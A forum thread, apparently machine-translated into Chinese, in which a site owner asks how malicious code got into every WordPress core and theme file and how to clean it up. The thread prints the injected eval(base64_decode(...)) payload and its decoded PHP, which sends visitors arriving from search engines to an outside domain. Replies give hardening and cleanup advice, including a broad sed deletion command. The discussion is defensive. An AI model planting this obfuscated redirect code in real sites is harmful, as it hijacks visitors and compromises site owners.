我们为客户端运行的一个WordPress网站已经被合并,并试图确定他们是如何进入的。似乎他们已经将代码注入了每个WP核心文件、所有主题文件和只有少数选择的插件文件中。
他们使用的代码是:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
以前有人见过或听说过这个吗?有人知道这是怎么发生的吗?所有WP文件权限都设置为推荐级别。
谢谢你抽出时间。
我见过这种情况最常见的方式是人们将所有文件和文件夹设置为777。如果必须对wp-content/uploads文件夹执行此操作,请确保其中有阻止脚本执行的.htaccess指令。您的文件和文件夹应该具有运行所需的最低权限(文件644、文件夹755)。
您还必须阅读这些WP链接上的所有说明,以完全清理您的安装,并防止代码注入WP核心或模板文件:请参阅常见问题解答:我的网站被黑客入侵了«WordPress Codex和如何完全清理您被黑客入侵的WordPress安装以及如何在被黑客攻击的WordPress和强化WordPress中找到后门«WordPress Codex。告诉您的主机并更改所有密码。也可能更换主机;一些共享主机比其他主机更容易受到攻击。
这并不总是有帮助,因为它取决于整体服务器和web主机参数,而在廉价的共享主机上,这些参数可能会使它们容易受到攻击,但你可以尝试这些来保护。htaccess和wp-config.php:
<Files .htaccess>
order deny,allow
deny from all
</Files>
<Files wp-config.php>
order allow,deny
deny from all
</Files>
在.htaccess.中
前几天我遇到了这个问题,发现sed在清理垃圾方面非常有用。它将自己附加到每个打开的PHP标记上,并且经常将代码放在行的末尾,因此需要进行一些仔细的配置。
我相信这是我使用的命令,但要小心,这毕竟是sed;-)。。。
find . -name "*.php" -type f -exec sed -i 's/eval(.*));//' {} ';
那么,下面的代码将您的用户重定向到黑名单恶意软件网站?这就是你正在经历的吗?
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex'.ru'/yandsearch'?(.*?)'&lr'=/",$referer) or preg_match ("/google'.(.*?)'/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://costabrava.bee.pl/");
exit();
}
}
}
}
您的Wordpress版本可能易受XSS攻击。此链接将对此进行讨论。http://www.ethicalhack3r.co.uk/security/wordpress-3-3-cross-site-scripting-xss/
你现在的版本是什么?
我遇到了完全相同的问题。
我想这个网站是通过小部件感染的,因为我使用了一个允许执行PHP代码的插件。
我最好的解决方案是:
- 消除可疑的小部件
- 查看一个受感染文件的时间和日期(我的案例:header.php)
- 清除所有感染的文件(在我的情况下,我有一个网站的备份)
- 在日志文件中搜索当时的可疑IP(搜索已找到黑名单上的IP)
- 安装一个插件来禁止可疑IP
从那一刻起,问题就消失了。